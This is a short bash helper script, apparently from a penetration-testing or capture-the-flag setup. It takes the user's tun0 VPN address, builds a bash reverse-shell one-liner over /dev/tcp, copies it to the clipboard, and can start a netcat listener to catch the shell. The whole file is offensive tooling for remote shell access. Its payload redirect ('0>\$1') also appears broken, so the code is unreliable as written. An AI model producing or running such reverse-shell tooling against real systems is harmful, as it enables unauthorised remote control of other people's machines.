#!/bin/bash

portlengts=$(printf "$1" | wc -c)
IP=$(ip addr show tun0 | grep -oP 'inet \K[\d.]+')
SHELL="bash -i >& /dev/tcp/$IP/$1 0>\$1"

echo $SHELL
echo $SHELL | wl-copy

if [ "$UID" -eq 0 ]; then
    echo "running as root"
else
    if [ "$portlengts" -lt 4 ]; then
        echo "port is not accessible. exiting"
        exit 0
    else
        echo "" > /dev/null
    fi
fi

if [ -z $2 ]; then
    exit 0 
elif [ "$2" == "-L" ]; then
    echo "starting listener"
    nc -lvvnp $1 
else
    exit 0
fi
